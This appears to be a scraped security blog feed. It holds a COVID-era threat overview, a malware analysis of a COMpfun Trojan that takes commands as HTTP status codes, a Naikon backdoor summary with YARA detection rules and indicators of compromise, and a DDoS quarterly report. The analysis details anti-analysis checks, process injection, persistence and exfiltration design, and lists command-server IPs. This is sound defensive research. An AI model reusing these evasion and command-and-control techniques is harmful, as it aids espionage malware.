Every year, our anti-malware research team releases a series of reports on various cyberthreats: financial malware, web attacks, exploits, etc. As we monitor the increase, or decrease, in the number of certain threats, we do not usually associate these changes with concurrent world events – unless these events have a direct relation to the cyberthreats, that is: for example, the closure of a large botnet and arrest of its owners result in a decrease in web attacks.

However, the COVID-19 pandemic has affected us all in some way, so it would be surprising if cybercriminals were an exception. Spammers and phishers were naturally the trailblazers in this – look for details in the next quarterly report – but the entire cybercrime landscape has changed in the last few months. Before we discuss the subject, let us get something out of the way: it would be farfetched to attribute all of the changes mentioned below to the pandemic. However, certain connections can be traced.

Remote work

The first thing that caught our attention was remote work. From an information security standpoint, an employee within the office network and an employee connecting to the same network from home are two completely different users. It seems cybercriminals share this view, as the number of attacks on servers and remote access tools has increased as their usage has grown. In particular, the average daily number of bruteforce attacks on database servers in April 2020 was up by 23% from January.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of botnet C&C servers by country, Q1 2020 (download)

Unique computers subjected to bruteforce attacks, January through April 2020

Cybercriminals use brute force to penetrate a company’s network and subsequently launch malware inside its infrastructure. We are monitoring several cybercrime groups that rely on the scheme. The payload is usually ransomware, mostly from the Trojan-Ransom.Win32.Crusis, Trojan-Ransom.Win32.Phobos and Trojan-Ransom.Win32.Cryakl families.

RDP-attacks and ways to counter these were recently covered in detail by Dmitry Galov in his blog post, “Remote spring: the rise of RDP bruteforce attacks“.

Remote entertainment

Online entertainment activity increased as users transitioned to a “remote” lifestyle. The increase was so pronounced that some video streaming services, such as YouTube, announced that they were changing their default video quality to help with reducing traffic. The cybercriminal world responded by stepping up web threats: the average daily number of attacks blocked by Kaspersky Web Anti-Virus increased by 25% from January 2020.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Web-based attacks blocked, January through April 2020 (download)

It is hard to single out one specific web threat as the driver – all of the threats grew more or less proportionally. Most web attacks that were blocked originated with resources that redirected users to all kinds of malicious websites. Some of these were phishing resources and websites that subscribed visitors to unsolicited push notifications or tried to scare them with fake system error warnings.
We also noticed an increase in Trojan-PSW browser script modifications that could be found on various infected sites. Their main task was to capture bank card credentials entered by users while shopping online and transfer these to cybercriminals.
Websites capable of silently installing cookie files on users’ computers (cookie stuffing) and resources that injected advertising scripts into users’ traffic together accounted for a significant share of the web threats.

2020. május 14.

COMpfun authors spoof visa application with HTTP status-based Trojan

You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic. If you’re wondering whether the actor behind the malware is still developing new features, the answer is yes. Later in November 2019 our Attribution Engine revealed a new Trojan with strong code similarities. Further research showed that it was obviously using the same code base as COMPFun.

What’s of interest inside

The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application. It is not clear to us exactly how the malicious code is being delivered to a target. The legitimate application was kept encrypted inside the dropper, along with the 32- and 64-bit next stage malware.

Overall infection chain. Interestingly, C2 commands are rare HTTP status codes

We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.

The authors keep the RSA public key and unique HTTP ETag in encrypted configuration data. Created for web content caching reasons, this marker could also be used to filter unwanted requests to the C2, e.g., those that are from network scanners rather than targets. Besides the aforementioned RSA public key to communicate with the C2, the malware also uses a self-generated AES-128 key.

Who is the author?

We should mention here once again that the COMPfun malware was initially documented by G-DATA in 2014; and although the company did not identify which APT was using the malware. Based mostly on victimology, we were able to associate it with the Turla APT with medium-to-low level of confidence.

What the Trojan is able to do

Its functions include the ability to acquire the target’s geolocation, gathering host- and network-related data, keylogging and screenshots. In other words, it’s a normal full-fledged Trojan that is also capable of propagating itself to removable devices.

As in previous malware from the same authors, all the necessary function addresses resolve dynamically to complicate analysis. To exfiltrate the target’s data to the C2 over HTTP/HTTPS, the malware uses RSA encryption. To hide data locally, the Trojan implements LZNT1 compression and one-byte XOR encryption.

Encrypted data Algorithm Key source Exfiltrated keystrokes, screenshots, etc. RSA Public key from configuration data Configuration data in .rsrc section XOR (plus LZNT1 compression) Hardcoded one-byte key Parameters inside the HTTP GET/POST requests AES-128 (plus ETag from config) Generated by Trojan and shared in beacon Commands and arguments from C2 for HTTP status 427 (dir, upl, usb, net) AES-128 Generated by Trojan and shared in beacon

Encryption and compression used by the Trojan for various tasks

Initial dropper

The first stage dropper was downloaded from the LAN shared directory. The file name related to the visa application process perfectly corresponds with the targeted diplomatic entities. As with all modules with a similar code base, the dropper begins by dynamically resolving all the required Windows API function addresses and puts them into structures. It then decrypts the next stage malware from its resource (.rsrc) section. The algorithm used to decrypt the next stage is a one-byte XOR using the key “0x55”, followed by LZNT1 decompression.

The following files are dropped to the disk in addition to the original application that the malware tries to mimic:

MD5 hash File name Features 1BB03CBAD293CA9EE3DDCE6F054FC325 ieframe.dll.mui 64-bit Trojan version A6AFA05CBD04E9AF256D278E5B5AD050 ExplorerFrame.dll.mui 32-bit Trojan version

The dropper urges users to run the file as administrator (using messages such as “need to run as admin”), then drops a version corresponding to the host’s architecture and sets the file system timestamp to 2013.12.20 22:31.

Interestingly, the dropper’s abilities aren’t limited to PE lures; as an alternative, this stage is also able to use .doc and .pdf files. In such cases, the dropper will open the files using the “open” shell command instead of running the legitimate spoofed executable application.

Main module – HTTP status-based Trojan SHA256 710b0fafe5fd7b3d817cf5c22002e46e2a22470cf3894eb619f805d43759b5a3 MD5 a6afa05cbd04e9af256d278e5b5ad050 Compiled 2015.06.26 09:42:27 (GMT) Type I386 Windows GUI DLL Size 593408 Internal name ExplorerFrame.dll.mui

The analysis below is based on the 32-bit sample from the table above. The legitimate ExplorerFrame.dll.mui is a language resource for the ExplorerFrame.dll file used by Windows Explorer.

Multi-threaded Trojan features such as monitoring USB devices to spread further and receiving commands as HTTP status codes

Initialization

As usual in this malware family’s code, a huge number of short standalone functions return all the readable strings. This is done to complicate analysis by not allowing the strings to be visible at a glance for researchers. The module’s preparation stage dynamically resolves all required Windows API function addresses into corresponding custom structures. Afterwards the malware uses indirect function calls only.

The module obtains the processor architecture (32- or 64-bit) and Windows OS version. It includes a number of anti-analysis checks for virtual machine-related devices (VEN_VMWARE, VBOX_HARDDISK, Virtual_DVD_ROM, etc.) to avoid controlled execution. It also notes which security products are running on the host (Symantec, Kaspersky, Dr.Web, Avast).

Before every communication with the C2, the malware checks if software such as debuggers (WinDbg, OllyDbg, Visual Studio) and host (Process Explorer or Monitor, etc.) or network monitoring (Wireshark, TCPView, etc.) programs are running. It also checks for internet connectivity and does not attempt to communicate if the checks fail.

The DLL also checks for potentially available launch processes that it can inject itself into. In the case of PaymentRequired, this could be system, security product or browser processes. Then the malware forms the corresponding code to drop files, delete files, etc.

The last step in the initialization procedure is to decrypt and decompress the configuration file. Decryption is done via a one-byte XOR using the 0xAA key, followed by decompression using the LZNT1 algorithm. From the configuration, the malware parses the RSA public key, ETag and IP addresses to communicate with its control servers.

Decrypted configuration data contains an RSA public key to encrypt exfiltrated data, C2 IPs and unique ETag to communicate with them

HTTP status-based communication module

Firstly, the module generates the following:

  • AES-128 encryption key used in HTTP GET/POST parameters and HTTP status code 427 (request new command);
  • 4-byte unique hardware ID (HWID) based on the host network adapters, CPU and first fixed logical drive serial number.

The module then chooses a process to inject the code into, in order of decreasing priority, starting from Windows (cmd.exe, smss.exe), security-related applications (Symantec’s nis.exe, Dr.Web’s spideragent.exe) and browsers (IE, Opera, Firefox, Yandex browser, Chrome).

The main thread checks if the C2 supports TLS in its configuration. If it does, communication will be over HTTPS and port 443; otherwise, the HTTP protocol and port 80 are used.

Config Parameter Value Encryption key RSA public key on the image above ETag C8E9CEAD2E084F58A94AEDC14D423E1A C2 IPs 95.183.49[.]10
95.183.49[.]29
200.63.45[.]35

Decrypted configuration content inside the analyzed sample

The first GET request sent contains an ETag “If-Match” header that is built using data from its decrypted configuration. ETags are normally used by web servers for caching purposes in order to be more efficient and save bandwidth by not resending redundant information if an ETag value matches. The implementation of ETags means the C2 may ignore all requests that are not sent from its intended targets if they don’t have the required ETag value.

HTTP status RFC status meaning Corresponding command functionality 200 OK Send collected target data to C2 with current tickcount 402 Payment Required This status is the signal to process received (and stored in binary flag) HTTP statuses as commands 422 Unprocessable Entity (WebDAV) Uninstall. Delete COM-hijacking persistence and corresponding files on disk 423 Locked (WebDAV) Install. Create COM-hijacking persistence and drop corresponding files to disk 424 Failed Dependency (WebDAV) Fingerprint target. Send host, network and geolocation data 427 Undefined HTTP status Get new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command 428 Precondition Required Propagate self to USB devices on target 429 Too Many Requests Enumerate network resources on target

C2 HTTP status code descriptions, including installation, USB propagation, fingerprinting, etc.

HTTP 427 can receive any of the following appended commands:

Command Command functionality dir Send directory content to C2 encrypted with RSA public key from config upl Send file to C2 encrypted with RSA public key from config usb Not implemented yet. Possibly same function planned as for HTTP status 428 net Not implemented yet. Possibly same function planned as for HTTP status 429 Removable device propagation module

If initialization is successful, the malware starts one more thread for dispatching Windows messages, looking for removable devices related to a WM_DEVICECHANGE event. The module runs its own handlers in the event of a USB device being plugged into or unplugged from the host.

Other spying modules: keylogger, screenshot tool and more

The user’s activity is monitored using several hooks. All of them gather the target’s data independently of any C2 command. Keystrokes are encrypted using the RSA public key stored in the configuration data and sent once every two seconds, or when moreа than 512 bytes are recorded. These 512 characters also include left mouse button clicks (written as the “MSLBTN” string) and Windows title bar texts. For clipboard content, the module calculates an MD5 hash and if it changes, encrypts the clipboard content with the same RSA public key and then sends it.

In a separate thread, the Trojan takes a bitmap screenshot using the GDIPlus library, compresses it with the LZNT1 algorithm, encrypts it using the key from the configuration data and sends it to the control server. A screenshot will be taken of the target and sent anyway, independently of any C2 command.

Last but not least

There are several choices – albeit not major additional technical ones – that the malware author made which we consider to be noteworthy.

The COM-hijacking-based persistence method injects its corresponding code and structure as a parameter into a legitimate process’s memory. The malware geolocates victims using legitimate web services: geoplugin.net/json.gp, ip-api.com/json and telize.com/geoip.

The unusual thread synchronization timeout calculation in the HTTP status thread is peculiar. Mathematically, the partial sum of the series is precisely:

This series, in the case of a full sum, is just a representation of the exponent. The developers probably used the exponent to make timeouts in the communication thread more unpredictable and grow at a fast rate, and the compiler calculated it this way.

So what did the COMPFun authors achieve?

We saw innovative approaches from the COMpfun developers twice in 2019. First, they bypassed TLS encrypted traffic via PRNG system function patching, and then we observed a unique implementation of C2 communications using uncommon HTTP status codes.

The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.

Indicators of compromise

File MD5 Hashes
Trojan 32-bit: A6AFA05CBD04E9AF256D278E5B5AD050
Trojan 64-bit: 1BB03CBAD293CA9EE3DDCE6F054FC325

IPs
95.183.49.10
95.183.49.29
200.63.45.35

2020. május 8.

Naikon’s Aria

Our colleagues at Checkpoint put together a fine research writeup on some Naikon resources and activity related to “aria-body” that we detected in 2017 and similarly reported in 2018. To supplement their research findings, we are summarizing and publishing portions of the findings reported in our June 2018 “Naikon’s New AR Backdoor Deployment to Southeast Asia”. This malware and activity aligns with much of what the Checkpoint researchers brought to light today.

The Naikon APT became well-known in May 2015, when our public reporting first mentioned and then fully described the group as a long running presence in the APAC region. Even when the group shutdown much of their successful offensive activity after years of campaigns, Naikon maintained several splinter campaigns. Matching malware artifacts, functionality, and targeting demonstrates that the group continues to wage cyber-espionage campaigns in the South China Sea region during 2018.

“Aria-Body” or “AR” is a set of backdoors that maintain compilation dates between January 2017 and February 2018. It can be particularly difficult to detect, as much of this code operates in memory, injected by other loader components without touching disk. We trace portions of this codebase back to “xsFunction” exe and dll modules used in Naikon operations going back to 2012, as their compiled modules implement a subset of the xsFunction feature set. In all likelihood, this new backdoor and related activity is an extension of or merge with the group’s “Paradir Operation”. In the past, the group targeted communications and sensitive information from executive and legislative offices, law enforcement, government administrative, military and intelligence organizations within Southeast Asia. In many cases we have seen that these systems also were targeted previously with PlugX and other malware. So, the group has evolved bit since 2015, and their activity targeting these same profiles continues into 2018. We identified at least a half dozen individual variants from 2017 and 2018.

Technical Details

It seems clear that the same codebase has been reused by Naikon since at least 2012, and recent AR backdoors were built from that same code. Their use was tightly clustered in previously and heavily Naikon-targeted organizations, again lending confidence to clustering these resources and activity with previous “Naikon”.


Naikon’s new AR backdoor is a dll loaded into any one of multiple processes, providing remote access to a system. AR load attempts have been identified within processes with executable images listed here:

  • c:\windows\system32\svchost.exe
  • c:\windows\syswow64\svchost.exe
  • c:\program files\windows nt\accessories\services.exe
  • c:\users\dell\appdata\roaming\microsoft\windows\start menu\programs\startup\acrobat.exe
  • c:\alphazawgyi\svchost.exe

Because this AR code is injected into processes, the yara rule provided in the Appendix is best run against memory dumps of processes maintaining a main image in the list above. The AR modules have additionally been seen in some others, including “msiexec.exe” processes.

Below are characteristics of the oldest AR and the newest known AR component in our collection.

MD5 c766e55c48a4b2e7f83bfb8b6004fc51 SHA256 357c8825b3f03414582715681e4e0316859b17e702a6d2c8ea9eb0fd467620a4 CompiledOn Tue Jan  3 09:23:48 2017 Type PE32 DLL Internal name TCPx86.dll Size 176kb Exports AzManager, DebugAzManager MD5 2ce4d68a120d76e703298f27073e1682 SHA256 4cab6bf0b63cea04c4a44af1cf25e214771c4220ed48fff5fca834efa117e5db CompiledOn Thu Feb 22 10:04:02 2018 Type PE32 DLL Internal Name aria-body-dllX86.dll Size 204kb Exports AzManager, DebugAzManager

When the dll is loaded, it registers a Windows class calling a specific Window procedure with a removable drive check, a CONNECT proxied callback to its main C2, an IP location verification against checkip.amazonaws[.]com, and further communications with a C2. Some previous modules’ flow may include more or less system information collection prior to the initial callback.

The most recent version of the backdoor utilizes another Window procedure to implement a raw input device based keystroke collector. This keylogger functionality was newly introduced to the malware code in February 2018, and was not present in previous versions.

The approximately 200 – 250kb AR backdoor family provides a familiar and slightly changing functionality set per compiled module. Because Checkpoint covers the same technical points in their post, we provide this simple summary list:

  • Persistence handling
  • File and directory handling
  • Keylogging
  • Shell/Process Management
  • Network activity and status listing and management
  • System information collection and management
  • Download management
  • Windows management
  • Extension management
  • Location/IP verification
  • Network Communications over HTTP
Similarities to past Naikon components

Naikon components going back to 2012 maintain heavy similarities with the current “Aria-body” modules. Not only is some of the functionality only lightly modified, but the same misspellings in error logging remains in their codebase. Let’s examine an older 2013 Naikon module and a newer 2017 Naikon AR module here.

It’s clear that the underlying codebase continues to be deployed:

e09254fa4398fccd607358b24b918b63, CompiledOn: 2013:09:10 09:00:15

c766e55c48a4b2e7f83bfb8b6004fc51, CompiledOn: 2017:01:03 09:23:48

Kudos to the Checkpoint researchers for providing new details of the Naikon story into the public discussion.

For reference, some hashes and a YARA rule are provided here. More incident, infrastructure, IOCs, and details have been and are available to our threat intel customers (please, contact intelreports@kaspersky.com).

Indicators of compromise

AR aria-body dll
c766e55c48a4b2e7f83bfb8b6004fc51
2ce4d68a120d76e703298f27073e1682

Loaders and related Naikon malware
0ed1fa2720cdab23d969e60035f05d92
3516960dd711b668783ada34286507b9

Verdicts – 2018 and Later
Trojan.Win32.Generic.gen
Trojan.Win32.SEPEH.gen
DangerousObject.Multi.Generic
Backdoor.Win64.Agent.h*
Backdoor.Win32.Agent.m*
Trojan-Downloader.Win32.Agent.x*

YARA Rules

rule apt_ZZ_Naikon_ARstrings : Naikon { meta: copyright = "Kaspersky" description = "Rule to detect Naikon aria samples" hash = "2B4D3AD32C23BD492EA945EB8E59B758" date = "2020-05-07" version = "1.0" strings: $a1 = "Terminate Process [PID=%d] succeeds!" fullword wide $a2 = "TerminateProcess [PID=%d] Failed:%d" fullword wide $a3 = "Close tcp connection returns: %d!" fullword wide $a4 = "Delete Directory [%s] returns:%d" fullword wide $a5 = "Delete Directory [%s] succeeds!" fullword wide $a6 = "Create Directory [%s] succeeds!" fullword wide $a7 = "SHFileOperation [%s] returns:%d" fullword wide $a8 = "SHFileOperation [%s] succeeds!" fullword wide $a9 = "Close tcp connection succeeds!" fullword wide $a10 = "OpenProcess [PID=%d] Failed:%d" fullword wide $a11 = "ShellExecute [%s] returns:%d" fullword wide $a12 = "ShellExecute [%s] succeeds!" fullword wide $a13 = "FindFirstFile [%s] Error:%d" fullword wide $a14 = "Delete File [%s] succeeds!" fullword wide $a15 = "CreateFile [%s] Error:%d" fullword wide $a16 = "DebugAzManager" fullword ascii $a17 = "Create Directroy [%s] Failed:%d" fullword wide $m1 = "TCPx86.dll" fullword wide ascii $m2 = "aria-body" nocase wide ascii condition: uint16(0) == 0x5A4D and filesize &lt; 450000 and (2 of ($a*) and 1 of ($m*)) } rule apt_ZZ_Naikon_codebase : Naikon { meta: report = "Naikon New AR Backdoor Deployment to Southeast Asia" description = "Naikon typo" author = "Kaspersky" copyright = "Kaspersky" version = "1.0" date = "2018-06-28" last_modified = "2018-06-28" strings: $a1 = "Create Directroy [%s] Failed:%d" wide condition: uint16(0) == 0x5A4D and filesize &lt; 450000 and $a1 }
2020. május 6.

DDoS attacks in Q1 2020

News overview

Since the beginning of 2020, due to the COVID-2019 pandemic, life has shifted almost entirely to the Web — people worldwide are now working, studying, shopping, and having fun online like never before. This is reflected in the goals of recent DDoS attacks, with the most targeted resources in Q1 being websites of medical organizations, delivery services, and gaming and educational platforms.

For instance, attackers in mid-March tried to disable the website of the US Department of Health and Human Services (HHS). The purpose of the attack was seemingly to deprive citizens of access to official data about the pandemic and measures taken against it. At the same time, unknown cyber actors spread misinformation in social networks and via text and e-mail about the introduction of a nationwide quarantine in the US. The attempt failed: the HHS website continued to function, despite the increased load.

The victim of another DDoS attack was the large Paris-based group of hospitals Assistance Publique-Hôpitaux de Paris. Cybercriminals attempted to disable the infrastructure of medical institutions. As a result, remote hospital workers were unable to use programs and corporate e-mail for some time. However, the attackers failed to paralyze the entire organization.

The food delivery services Lieferando (Germany) and Thuisbezorgd (Netherlands) found themselves in a more awkward situation. DDoS attacks on both companies meant that although they could accept orders, they could not process them and had to return customers’ money. What’s more, the cybercriminals targeting Lieferando demanded 2 BTC (a shade over US$13,000 at the time of writing) to halt the DDoS.

The German distance-learning platform Mebis was attacked on the very first remote school day. The service, which enables teachers in the federal state of Bavaria to exchange materials, homework, and tests with schoolchildren, was down for several hours.

Online games, whose popularity has soared under quarantine, were hit repeatedly. In particular, attackers flooded the servers of Battle.net and Eve Online with junk traffic, the latter facing nine straight days of bombardment. Belarusian company Wargaming also came under fire: players of World of Tanks, World of Warships, and other titles had problems with server speeds for several days. However skeptical users claimed that the problems had nothing at all to do with cybercriminals.

Australian authorities in late March reported a DDoS attack on the MyGov social services portal, but a couple of hours after the major announcement they were forced to admit they had made a mistake. It turned out that the site could not cope with the influx of perfectly genuine requests from citizens out of work as a result of the pandemic.

Besides DDoS attacks directly or indirectly related to the all-conquering coronavirus, this quarter saw a continuation of politically motivated attacks. In the second half of January, for instance, unknown cyber actors made two attempts to bring down the websites of government agencies and emergency services in Greece. Among the resources taken temporarily offline were the websites of the prime minister, several ministries, the fire service, and the police. The Turkish group Anka Neferler Tim claimed responsibility for the first attack, but the Greek authorities are not rushing to any final conclusions, especially since the perpetrators of the second attack have yet to announce themselves.

This year will see the next US presidential election, and the runup to it, as always, is accompanied by DDoS attacks. For example, a voter registration and information website was hit in early February. The attackers employed the PRSD (pseudorandom subdomain attack) technique to send numerous requests to non-existent subdomains of the site. However, the DDoS attempt failed: the resource was protected against attacks of this kind.

Financial institutions were not spared either. In February, the cryptocurrency exchanges OKEx and Bitfinex were subjected to sophisticated DDoS attacks. The first has assured that it handled the incident without detriment to users, while the second was forced offline for an hour. According to Bitfinex management, this was necessary to set up specialized protection. Whether the incidents were just similar or related is not known.

The BitMEX crypto exchange likewise announced a DDoS attack this quarter — not once but twice. Its access problems coincided with a sharp drop in the value of bitcoin, which prompted a wave of suspicion among customers. Some believe that the exchange intentionally went offline to prevent a mass sell-off. BitMEX later promised to pay compensation, but only to 156 users who had lost deals in the ETH/USD pair.

As in the previous quarter, ransomware attacks by well-known APT groups made the news. In late February, Australian financial institutions received e-mails demanding large sums in the cryptocurrency Monero. The attackers introduced themselves as the Silence group, and threatened DDoS attacks for non-payment. Earlier, e-mails with similar threats had been received by companies from Singapore, Turkey, South Africa, and other countries. The ransomers went by the various names of Cozy Bear, Fancy Bear, Anonymous, Carbanak, and Emotet in the hope that victims would google them and be scared into compliance.

Unlike these international ransomware groups, a teenager from Odessa who last year tried to DDoS a company that had refused to coooperate was caught by police in January 2020. The youngster wanted to force a Ukrainian internet service provider to hand over information about a customer. On being refused, he attempted to disable the company’s network. The attack was reported to be quite powerful.

Overall, the past quarter was fairly rich in arrests. In February, Arthur Dam was detained in the US charged with carrying out four DDoS attacks on the website of congressional candidate Bryan Caforio in 2018, taking it offline for a total of 21 hours. The prosecution noted that Dam’s wife worked for Caforio’s rival Katie Hill, who ultimately won the vote.

Another cybercriminal was detained in Krasnodar in mid-March for attacking the online store of a company in Cherepovets, Russia. Although he had carefully masked the source of the DDoS attack, cyber police managed to trace him. The individual claimed that he had simply wanted to demonstrate his skills and offer his services to the company to defend against DDoS attacks. However, the idea failed even before his arrest, since he was unable to bring down the site.

This guy is by no means the only “double agent” in the DDoS world. In New Jersey, Tucker Preston, founder of BackConnect, a DDoS mitigation firm, admitted to a similar crime. From December 2015 to February 2016, Preston hired third parties to bombard the New Jersey-based servers of an unnamed organization with junk traffic. The offense carries up to ten years in jail and a maximum fine of US$250,000.

The owners of a website allegedly used to launch custom DDoS attacks could also be forced to fork out. Video game publisher Ubisoft filed a lawsuit against the resource after a string of attacks on the servers ofTom Clancy’s Rainbow Six Siege. According to the developer, the site — which purportedly helps clients test their own security — actually specializes in DDoSing games. Ubisoft is seeking the closure of the resource and damages from the owners.

Quarter trends

This quarter has been dominated by the coronavirus pandemic, which has shaken up many things in the world, including the DDoS market. Contrary to our forecast in the last report, in Q1 2020 we observed a significant increase in both the quantity and quality of DDoS attacks. The number of attacks doubled against the previous reporting period, and by 80% against Q1 2019. The attacks also became longer: we observed a clear rise in both the average and maximum duration. The first quarter of every year sees a certain spike in DDoS activity, but we did not expect this kind of surge.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Comparison of the total number of DDoS attacks in Q1 2020 and Q1 and Q4 2019; Q1 2019 is taken as the 100% reference value (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Duration of DDoS attacks in Q1 2020 and Q1 and Q4 2019; Q1 2019 is taken as the 100% reference value (download)

Against a backdrop of overall growth, the share of smart attacks remained virtually unchanged over the past year: the first quarters of 2019 and 2020 were at the same level, around 42%. This points to a rise in interest in DDoS attacks on the part of both professionals and amateurs: the number of overall attacks is growing at the same pace as the number of smart attacks, so the proportion has not changed.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of smart attacks in the total number of DDoS attacks in Q1 2020 and Q1 and Q4 2019 (download)

Interestingly, the number of DDoS attacks on educational and administrative web resources tripled compared to the same period in 2019. Moreover, such attacks in Q1 2020 amounted to 19% of the total number of incidents, against just 11% a year ago.

The upswing in cybercriminal interest in such resources could be linked to the spread of COVID-19, which has created more demand for distance-learning services and official sources of information. Since the start of 2020, the pandemic has affected all industries. So it is logical for it to impact the DDoS market too. Going forward, this effect may become even more pronounced.

Although it is difficult to predict anything at a time of such global instability, it can be assumed that the attacks will not decrease: many organizations are now switching to remote working, and with that the set of viable targets is increasing. If earlier the target in most cases was companies’ public resources, now key infrastructure elements, such as corporate VPN gateways or non-public web resources (mail, corporate knowledge base, etc.), may be at risk. This is opening up new niches for attack organizers, and could lead to DDoS market growth.

Statistics Methodology

Kaspersky has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q1 2020.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • In Q1 2020, most C&C servers were still registered in the US (39.93%), while most bots were in Brazil.
  • In terms of the dynamics of the number of attacks overall, this quarter was very similar to the last — with peaks of more than 230 attacks on February 14 and 15 and a drop to 16 attacks on January 25.
  • DDoS attackers were most active on Mondays, and more likely to rest on Wednesdays.
  • SYN flooding is still the most popular type of attack (and even strengthened its position with 92.6% of all attacks), while ICMP attacks unexpectedly jumped ahead of all other varieties into second place.
  • Windows botnets continue to gain popularity: the share of attacks using them grew by 3 p.p. to 5.64%.
Geography of unique IP addresses used in attacks

This quarter, we decided to look at the distribution by country of botnets and their component bots. To do so, we analyzed the location of the unique IP addresses from which attacks on our honeypots were registered.

First place in the TOP 10 countries by number of bots goes to Brazil, with 12.25% of unique IP addresses. In second place, less than one percentage point behind, is China (11.51%), while third position — by a much wider margin — is taken by Egypt (7.87%). The remaining TOP 10 countries scored from 6.5% to 2.5% of the total number of bot IP addresses. The rating also featured several Asian countries (Vietnam (6.41%) in fourth; Taiwan (3.96%) in seventh; India (3.65%) in eighth), plus Iran (5.56%) in fifth place, Russia (4.65%) in sixth, and the US (3.56%) in ninth. The TOP 10 is rounded out by Turkey, the source of 2.86% of unique addresses used for attacks.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of botnets by country, Q1 2020 (download)

Curiously, this distribution only partially correlates with the attack statistics. Whereas China has long occupied top spot in the ranking by number of attacks, and Vietnam is a regular visitor to the TOP 10, the leader of the rating by number of unique IPs, Brazil, has only been in the TOP 20 once this past year, taking 20th position in Q1 2019. More often than not, it appears only in the bottom third of the TOP 30, not unlike Iran, which closes off the TOP 5 by number of bots. As for Egypt (3rd place by number of bots), it is the source of very few registered attacks, so it generally lies outside even the TOP 30.

Botnet distribution geography

If individual attack devices are mainly located in South America, Asia, and the Middle East, C&C servers, as in the previous quarter, are more often registered in the US and Europe. First place by number of C&Cs is retained by the US, where in Q1 2020 almost 40% of the total were registered (down 18.5 p.p. against the end of last year). Second place is occupied by the Netherlands (10.07%), which climbed up from eighth, and third goes to Germany (9.55%), which last quarter was nowhere to be seen in the TOP 10. As we saw above, of the TOP 3 countries by number of C&C servers, only the US hosted a significant number of bots.

Fourth position by number of C&Cs went to another European country, this time France (8.51%), climbing two rungs up the ladder. China showed the exact opposite trend, falling from third to fifth (3.99% vs 9.52% in Q4 2019). Canada (2.95%) took sixth place, up from ninth, while seventh position was shared by Russia, Romania (back in the TOP 10 after a quarterly break), and newcomer Croatia. Each of these countries scored 2.43% of the total number of C&C servers. The TOP 10 is rounded out by another newcomer, Singapore, on 2.08%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of botnet C&C servers by country, Q1 2020 (download)

Dynamics of the number of DDoS attacks

The dynamics of the number of attacks in Q1 2020 are in many ways similar to what we saw at the end of 2019. The peak indicators did not exceed 250 attacks per day (the hottest were February 14 and 15, that is, on and just after St Valentine’s Day (242 and 232 attacks, respectively), as well as the 3rd and 10th of that same month). The calmest days of the quarter were January 25 and March 18, when the number of attacks fell short of 20 a day (recall that the quietest day of Q4 2019 saw only 8 registered attacks).

